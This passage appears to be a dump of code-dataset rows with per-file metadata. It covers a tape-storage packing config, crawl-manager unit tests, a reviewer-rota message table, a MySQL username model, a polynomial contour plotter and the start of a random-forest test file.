},
9: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-hotqcdhisq',
'wrapper': 'cern',
},
'minimal_file_size': 8600000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 24*3600,
},
10: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-nHYPBSM',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 12*3600,
},
11: {'rule': {'storage_group': 'lqcd',
'file_family': 'lqcd-pndme',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 10*1000,
'max_waiting_time': 12*3600,
},
12: {'rule': {'storage_group': 'nova',
'file_family': 'montecarlo',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
13: {'rule': {'storage_group': 'nova',
'file_family': 'rawdata_FarDet',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
14: {'rule': {'storage_group': 'nova',
'file_family': 'rawdata_NDOS_unmerged',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
15: {'rule': {'storage_group': 'nova',
'file_family': 'reco_NDOS',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
16: {'rule': {'storage_group': 'scene',
'file_family': 'scene',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF1',
'max_files_in_pack': 65,
'max_waiting_time': 24*3600,
},
},
'CD-LTO4F1.library_manager': {
1: {'rule': {'storage_group': 'argoneut',
'file_family': 'rawdata',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 1100,
'max_waiting_time': 24*3600,
},
2: {'rule': {'storage_group': 'argoneut',
'file_family': 'root_files',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 4000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 100,
'max_waiting_time': 24*3600,
},
3: {'rule': {'storage_group': 'minerva',
'file_family': 'binary-raw-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
4: {'rule': {'storage_group': 'minerva',
'file_family': 'calibrated-pool-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
5: {'rule': {'storage_group': 'minerva',
'file_family': 'rawdigits-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
6: {'rule': {'storage_group': 'minerva',
'file_family': 'reconstructed-pool-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 3600,
},
7: {'rule': {'storage_group': 'minerva',
'file_family': 'supdigits-test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 3600,
},
8: {'rule': {'storage_group': 'minerva',
'file_family': 'data_dst',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
9: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
10: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing_cal',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
11: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing_rawdigits',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
12: {'rule': {'storage_group': 'minerva',
'file_family': 'data_processing_sup',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
13: {'rule': {'storage_group': 'minerva',
'file_family': 'data_reconstructed',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
14: {'rule': {'storage_group': 'minerva',
'file_family': 'data_results',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
15: {'rule': {'storage_group': 'minerva',
'file_family': 'rawdata',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
20: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_processing_cal',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
21: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_reconstructed',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 15,
'max_waiting_time': 24*3600,
},
22: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_results',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 50,
'max_waiting_time': 24*3600,
},
23: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_dst',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 150,
'max_waiting_time': 24*3600,
},
24: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_generation',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 1000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 2500,
'max_waiting_time': 24*3600,
},
25: {'rule': {'storage_group': 'minerva',
'file_family': 'mc_minos',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 5000000000L,
'resulting_library':'CD-DiskSF',
'max_files_in_pack': 200,
'max_waiting_time': 24*3600,
},
},
'CD-LTO4F1T.library_manager': {
2: {'rule': {'storage_group': 'ssa_test',
'file_family': 'ssa_test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'max_files_in_pack': 100,
'max_waiting_time': 120,
'resulting_library':'CD-DiskSFT'
}
},
'CD-LTO4GST.library_manager': {
1: {'rule': {'storage_group': 'ssa_test',
'file_family': 'ssa_test',
'wrapper': 'cpio_odc',
},
'minimal_file_size': 2000000000L,
'max_files_in_pack': 100,
'max_waiting_time': 120,
'resulting_library':'CD-DiskSF1T'
}
},
}
| 69.865753
| 107
| 0.248931
| 1,199
| 25,501
| 4.914929
| 0.092577
| 0.072798
| 0.105888
| 0.092652
| 0.943153
| 0.928559
| 0.863058
| 0.793653
| 0.756151
| 0.698456
| 0
| 0.103336
| 0.675542
| 25,501
| 364
| 108
| 70.057692
| 0.608895
| 0.002039
| 0
| 0.551247
| 0
| 0
| 0.217079
| 0.009313
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f7d4b776c9ad3dbb353aa31ac1170b96958352f6
| 10,931
|
py
|
Python
|
tests/test_crawl_manager.py
|
curita/shub-workflow
|
5450da1502f8c300be242609dc6ae67bd3702079
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_crawl_manager.py
|
curita/shub-workflow
|
5450da1502f8c300be242609dc6ae67bd3702079
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_crawl_manager.py
|
curita/shub-workflow
|
5450da1502f8c300be242609dc6ae67bd3702079
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from unittest import TestCase
from unittest.mock import patch, Mock
from shub_workflow.crawl import CrawlManager, PeriodicCrawlManager, GeneratorCrawlManager
from .utils.contexts import script_args
class TestManager(CrawlManager):
name = "test"
class PeriodicTestManager(PeriodicCrawlManager):
name = "test"
class ListTestManager(GeneratorCrawlManager):
name = "test"
default_max_jobs = 2
def set_parameters_gen(self):
parameters_list = [
{"argA": "valA"},
{"argA": "valB"},
{"argB": "valC"},
]
for args in parameters_list:
yield args
class TestManagerWithSpider(CrawlManager):
name = "test"
spider = "myimplicitspider"
class CrawlManagerTest(TestCase):
def setUp(self):
os.environ["SH_APIKEY"] = "ffff"
os.environ["PROJECT_ID"] = "999"
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = TestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# second loop: spider still running. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# third loop: spider is finished. Stop.
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
mocked_super_schedule_spider.reset_mock()
result = manager.workflow_loop()
self.assertFalse(result)
self.assertFalse(mocked_super_schedule_spider.called)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_implicit_spider(self, mocked_super_schedule_spider):
with script_args([]):
manager = TestManagerWithSpider()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myimplicitspider", units=None, job_settings={})
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_badoutcome(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = TestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# second loop: spider still running. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# third loop: spider is finished. Stop.
manager.is_finished = lambda x: "cancelled" if x == "999/1/1" else None
mocked_super_schedule_spider.reset_mock()
result = manager.workflow_loop()
self.assertFalse(result)
self.assertFalse(mocked_super_schedule_spider.called)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_with_resume(self, mocked_super_schedule_spider):
with script_args(["myspider", "--flow-id=3a20", "--resume-workflow"]):
manager = TestManager()
manager.get_owned_jobs = Mock()
manager.get_owned_jobs.side_effect = [[{"key": "999/1/1"}]]
manager._WorkFlowManager__on_start()
self.assertEqual(manager.get_owned_jobs.call_count, 1)
# first loop: spider still running in workflow. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# second loop: spider is finished. Stop.
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
result = manager.workflow_loop()
self.assertFalse(result)
self.assertFalse(mocked_super_schedule_spider.called)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_periodic(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = PeriodicTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# second loop: spider still running. Continue.
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
# third loop: spider is finished. Schedule again.
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
mocked_super_schedule_spider.reset_mock()
mocked_super_schedule_spider.side_effect = ["999/1/2"]
result = manager.workflow_loop()
self.assertTrue(result)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
# four loop: spider is cancelled. Schedule again.
manager.is_finished = lambda x: "cancelled" if x == "999/1/2" else None
mocked_super_schedule_spider.reset_mock()
mocked_super_schedule_spider.side_effect = ["999/1/3"]
result = manager.workflow_loop()
self.assertTrue(result)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, job_settings={})
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_list(self, mocked_super_schedule_spider):
with script_args(["myspider"]):
manager = ListTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1", "999/1/2", "999/1/3"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider with first set of arguments
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 2)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argA="valA", job_settings={})
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argA="valB", job_settings={})
# second loop: still no job finished. Wait for a free slot
manager.is_finished = lambda x: None
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 2)
# third loop: finish one job. We can schedule last one with third set of arguments
manager.is_finished = lambda x: "finished" if x == "999/1/1" else None
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argB="valC", job_settings={})
# fourth loop: waiting jobs to finish
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
# fifth loop: second job finished
manager.is_finished = lambda x: "cancelled" if x == "999/1/2" else None
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
# sixth loop: last job finished. Exit
manager.is_finished = lambda x: "finished" if x == "999/1/3" else None
result = manager.workflow_loop()
self.assertFalse(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 3)
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_list_explicit_spider(self, mocked_super_schedule_spider):
class _ListTestManager(GeneratorCrawlManager):
name = "test"
default_max_jobs = 2
spider = "myspider"
def set_parameters_gen(self):
parameters_list = [
{"argA": "valA"},
{"argA": "valB", "spider": "myspidertwo"},
]
for args in parameters_list:
yield args
with script_args([]):
manager = _ListTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1", "999/1/2"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider with first set of arguments
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 2)
mocked_super_schedule_spider.assert_any_call("myspider", units=None, argA="valA", job_settings={})
mocked_super_schedule_spider.assert_any_call("myspidertwo", units=None, argA="valB", job_settings={})
@patch("shub_workflow.crawl.WorkFlowManager.schedule_spider")
def test_schedule_spider_list_scrapy_cloud_params(self, mocked_super_schedule_spider):
class _ListTestManager(GeneratorCrawlManager):
name = "test"
default_max_jobs = 2
spider = "myspider"
def set_parameters_gen(self):
parameters_list = [
{
"argA": "valA",
"units": 2,
"tags": ["CHECKED"],
"project_id": 999,
"job_settings": {"CONCURRENT_REQUESTS": 2},
},
]
for args in parameters_list:
yield args
with script_args([]):
manager = _ListTestManager()
mocked_super_schedule_spider.side_effect = ["999/1/1", "999/1/2"]
manager._WorkFlowManager__on_start()
# first loop: schedule spider with first set of arguments
result = manager.workflow_loop()
self.assertTrue(result)
self.assertEqual(mocked_super_schedule_spider.call_count, 1)
mocked_super_schedule_spider.assert_any_call(
"myspider", units=2, argA="valA", job_settings={"CONCURRENT_REQUESTS": 2}, project_id=999, tags=["CHECKED"]
)
| 37.954861
| 119
| 0.664349
| 1,240
| 10,931
| 5.56371
| 0.107258
| 0.14205
| 0.132193
| 0.173938
| 0.84563
| 0.836933
| 0.831425
| 0.81809
| 0.81809
| 0.794318
| 0
| 0.017049
| 0.238039
| 10,931
| 287
| 120
| 38.087108
| 0.811262
| 0.084439
| 0
| 0.721649
| 0
| 0
| 0.106549
| 0.040857
| 0
| 0
| 0
| 0
| 0.252577
| 1
| 0.061856
| false
| 0
| 0.025773
| 0
| 0.154639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f7eaf4936a1f29b84a16462835a7c8320552cf21
| 2,092
|
py
|
Python
|
messages/comments_reviewer.py
|
qxf2/daily-messages
|
0e93033df8d519873094928eba2a9d0151f1b459
|
[
"MIT"
] | null | null | null |
messages/comments_reviewer.py
|
qxf2/daily-messages
|
0e93033df8d519873094928eba2a9d0151f1b459
|
[
"MIT"
] | 5
|
2020-09-15T10:30:37.000Z
|
2021-01-21T18:42:04.000Z
|
messages/comments_reviewer.py
|
qxf2/daily-messages
|
0e93033df8d519873094928eba2a9d0151f1b459
|
[
"MIT"
] | 2
|
2020-08-27T10:24:38.000Z
|
2021-01-27T13:00:06.000Z
|
messages = { '2021-03-18':"<b>@all</b>, Comment reviewers for next week are- Rahul and Rohan J." ,
'2021-03-26':"<b>@all</b>, Comment reviewers for next week are- Akkul and Rohan D.",
'2021-04-01':"<b>@all</b>, Comment reviewers for next week are- Annapoorani and Shivahari.",
'2021-04-08':"<b>@all</b>, Comment reviewers for next week are- Rohan J. and Drishya.",
'2021-04-15':"<b>@all</b>, Comment reviewers for next week are- Rohini and Raghava.",
'2021-04-22':"<b>@all</b>, Comment reviewers for next week are- Avinash and Rahul.",
'2021-04-29':"<b>@all</b>, Comment reviewers for next week are- Mohan and Nilaya.",
'2021-05-06':"<b>@all</b>, Comment reviewers for next week are- Smitha and Preedhi.",
'2021-05-13':"<b>@all</b>, Comment reviewers for next week are- Rohan D. and Drishya.",
'2021-05-20':"<b>@all</b>, Comment reviewers for next week are- Rohini and Sravanti.",
'2021-05-27':"<b>@all</b>, Comment reviewers for next week are- Indira and Raghava.",
'2021-06-03':"<b>@all</b>, Comment reviewers for next week are- Annapoorani and Rohan J.",
'2021-06-10':"<b>@all</b>, Comment reviewers for next week are- Shivahari and Akkul.",
'2021-06-17':"<b>@all</b>, Comment reviewers for next week are- Avinash and Nilaya.",
'2021-06-24':"<b>@all</b>, Comment reviewers for next week are- Smitha and Rohan J.",
'2021-07-01':"<b>@all</b>, Comment reviewers for next week are- Rohini and Preedhi.",
'2021-07-08':"<b>@all</b>, Comment reviewers for next week are- Rohan D. and Mohan.",
'2021-07-15':"<b>@all</b>, Comment reviewers for next week are- Drishya and Raghava.",
'2021-07-22':"<b>@all</b>, Comment reviewers for next week are- Shivahari and Rahul.",
'2021-07-29':"<b>@all</b>, Comment reviewers for next week are- Indira and Sravanti.",
'2021-08-05':"<b>@all</b>, Comment reviewers for next week are- Annapoorani and Akkul.",
}
| 95.090909
| 104
| 0.600382
| 323
| 2,092
| 3.888545
| 0.142415
| 0.066879
| 0.083599
| 0.200637
| 0.738057
| 0.738057
| 0.738057
| 0.738057
| 0.738057
| 0.682325
| 0
| 0.103768
| 0.226099
| 2,092
| 22
| 105
| 95.090909
| 0.67202
| 0
| 0
| 0
| 0
| 0
| 0.80172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7f0b08c222caa44dd042bd783f69e8d7aaef915
| 1,870
|
py
|
Python
|
app/models/Username.py
|
haryobagus/haryo_ig
|
1ad160b422d2c6d5b9b3016e312eb77a576ff9b1
|
[
"MIT"
] | null | null | null |
app/models/Username.py
|
haryobagus/haryo_ig
|
1ad160b422d2c6d5b9b3016e312eb77a576ff9b1
|
[
"MIT"
] | null | null | null |
app/models/Username.py
|
haryobagus/haryo_ig
|
1ad160b422d2c6d5b9b3016e312eb77a576ff9b1
|
[
"MIT"
] | null | null | null |
from app.config import db
def get_all():
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = '''SELECT * FROM ig_usernames ORDER BY id DESC'''
cursor.execute(sql)
conn.commit()
conn.close()
return cursor.fetchall()
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def get_one(id):
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = "SELECT * FROM ig_usernames WHERE id=%s"
cursor.execute(sql, (id,))
conn.commit()
conn.close()
return cursor.fetchone()
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def store(data):
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = '''INSERT INTO ig_usernames (`username`) values (%s)'''
cursor.execute(sql, (data['username'],))
conn.commit()
conn.close()
return True
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def update(data, id):
print(data)
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = '''UPDATE ig_usernames SET `username`=%s WHERE id=%s'''
cursor.execute(sql, (data['username'], id))
conn.commit()
conn.close()
return True
except Exception as e:
print("Exeception occured:{}".format(e))
return False
def delete(id):
try:
conn = db.conn()
with conn.cursor() as cursor:
sql = "DELETE FROM ig_usernames WHERE id=%s"
cursor.execute(sql, (id,))
conn.commit()
conn.close()
return True
except Exception as e:
print("Exeception occured:{}".format(e))
return False
| 27.910448
| 73
| 0.542781
| 221
| 1,870
| 4.561086
| 0.217195
| 0.034722
| 0.044643
| 0.064484
| 0.822421
| 0.822421
| 0.72123
| 0.72123
| 0.72123
| 0.72123
| 0
| 0
| 0.328877
| 1,870
| 67
| 74
| 27.910448
| 0.803187
| 0
| 0
| 0.725806
| 0
| 0
| 0.179583
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080645
| false
| 0
| 0.016129
| 0
| 0.258065
| 0.096774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7913179f368e27dbaa2d116839f327fa1b424800
| 3,803
|
py
|
Python
|
mavi/jax/util/plot.py
|
HiroshiKERA/monomial-agnostic-vanishing-ideal
|
ddfb53ded0ee87f129ec029603e8245565f653d2
|
[
"MIT"
] | null | null | null |
mavi/jax/util/plot.py
|
HiroshiKERA/monomial-agnostic-vanishing-ideal
|
ddfb53ded0ee87f129ec029603e8245565f653d2
|
[
"MIT"
] | null | null | null |
mavi/jax/util/plot.py
|
HiroshiKERA/monomial-agnostic-vanishing-ideal
|
ddfb53ded0ee87f129ec029603e8245565f653d2
|
[
"MIT"
] | null | null | null |
import jax.numpy as np
import matplotlib.pyplot as plt
def plot(vi, X,
target='vanishing',
n=1000, scale=1.5, x_max=1.0, y_max=1.0,
z_func=lambda x_, y_: 0.0,
show=False, splitshow=False):
nvars = X.shape[-1]
if nvars == 2:
_plot2d(vi, X, target=target,
n=n, scale=scale, x_max=x_max, y_max=y_max,
show=show, splitshow=splitshow)
elif nvars == 3:
_plot3d(vi, X, z_func, target=target,
n=n, scale=scale, x_max=x_max, y_max=y_max,
show=show, splitshow=splitshow)
else:
print(f'Cannot plot {nvars}-variate polynomials')
def _plot2d(vi, X, target='vanishing', n=1000, scale=1.5, x_max=1.0, y_max=1.0, show=False, splitshow=False):
## set plot range
m = np.mean(X, axis=0)
x_max = y_max = np.max(np.abs(X))
# x = np.arange(-scale*x_max, scale*x_max, resolution)
# y = np.arange(-scale*y_max, scale*y_max, resolution)
x = np.linspace(-scale*x_max, scale*x_max, 50)
y = np.linspace(-scale*y_max, scale*y_max, 50)
Z1, Z2 = np.meshgrid(x, y)
## set plot setting
npolys = 0
if target == 'vanishing':
# npolys = sum([Gt.shape[-1] for Gt in vi.basis.vanishings()])
npolys = sum([Bt.n_vanishings() for Bt in vi.basis])
# npolys = sum([len(Gt) for Gt in vi.basis.vanishings()])
elif target == 'nonvanishing':
npolys = sum([Bt.n_nonvanishings() for Bt in vi.basis])
colors = plt.cm.Dark2(np.linspace(0,1,8))
linestyles = ['solid','dashed','dashdot', 'dotted']
nfigs = min(npolys, n)
for i in range(nfigs):
f = lambda x_, y_: vi.evaluate(np.array([[x_,y_]]), target=target)[0,i]
f = np.vectorize(f)
plt.contour(Z1,Z2,f(Z1, Z2), levels=[0], colors=[colors[i%len(colors)]], linewidths=[1.], linestyles=[linestyles[i%4]])
if splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
plt.show()
if not splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
# plt.savefig('graph_Z.pdf')
if not splitshow and show:
plt.show()
def _plot3d(vi, X, z_func, target='vanishing', n=1000, scale=1.5, x_max=1.0, y_max=1.0, show=False, splitshow=False):
## set plot range
m = np.mean(X, axis=0)
x_max = y_max = np.max(np.abs(X))
x = np.linspace(-scale*x_max, scale*x_max, 50)
y = np.linspace(-scale*y_max, scale*y_max, 50)
Z1, Z2 = np.meshgrid(x, y)
## set plot setting
npolys = 0
if target == 'vanishing':
npolys = sum([np.asarray(Gt).shape[-1] for Gt in vi.basis.vanishings()])
# npolys = sum([len(Gt) for Gt in vi.basis.vanishings()])
elif target == 'nonvanishing':
npolys = sum([np.asarray(Ft).shape[-1] for Ft in vi.basis.nonvanishings()])
else:
print('unknown target: %s' % target)
colors = plt.cm.Dark2(np.linspace(0,1,8))
linestyles = ['solid','dashed','dashdot', 'dotted']
nfigs = min(npolys, n)
for i in range(nfigs):
f = lambda x_, y_: vi.evaluate(np.array([[x_,y_, z_func(x_,y_)]]), target=target)[0,i]
f = np.vectorize(f)
plt.contour(Z1,Z2,f(Z1, Z2), levels=[0], colors=[colors[i%len(colors)]], linewidths=[1.], linestyles=[linestyles[i%4]])
if splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
plt.show()
if not splitshow:
plt.plot(X[:,0], X[:,1], 'o', mfc='none', alpha=0.8)
plt.gca().set_aspect('equal', adjustable='box')
# plt.savefig('graph_Z.pdf')
if not splitshow and show:
plt.show()
| 35.877358
| 127
| 0.576913
| 603
| 3,803
| 3.542289
| 0.172471
| 0.02809
| 0.033708
| 0.014981
| 0.854401
| 0.830056
| 0.800094
| 0.800094
| 0.800094
| 0.800094
| 0
| 0.033875
| 0.239285
| 3,803
| 105
| 128
| 36.219048
| 0.704459
| 0.108598
| 0
| 0.702703
| 0
| 0
| 0.067003
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040541
| false
| 0
| 0.027027
| 0
| 0.067568
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
792adb7f071cd1c0bc5787f281800053775c5ede
| 15,297
|
py
|
Python
|
tests/test_core.py
|
pyensemble/wildwood
|
b261cbd7d0b425b50647f719ab99c1d89f477d5c
|
[
"BSD-3-Clause"
] | 22
|
2021-06-24T11:30:03.000Z
|
2022-03-09T00:59:30.000Z
|
tests/test_core.py
|
pyensemble/wildwood
|
b261cbd7d0b425b50647f719ab99c1d89f477d5c
|
[
"BSD-3-Clause"
] | 65
|
2021-03-13T17:50:03.000Z
|
2022-02-22T16:50:02.000Z
|
tests/test_core.py
|
pyensemble/wildwood
|
b261cbd7d0b425b50647f719ab99c1d89f477d5c
|
[
"BSD-3-Clause"
] | 3
|
2021-03-04T18:44:10.000Z
|
2022-01-26T17:28:35.000Z
|
# Authors: Stephane Gaiffas <stephane.gaiffas@gmail.com>
# License: BSD 3 clause
"""
This module performs unittests on some core computations involved in WildWood
"""
import pytest
import numpy as np
from wildwood import ForestClassifier, ForestRegressor
from wildwood.datasets import load_adult, load_boston, load_car
from wildwood._split import is_bin_in_partition
@pytest.mark.parametrize(
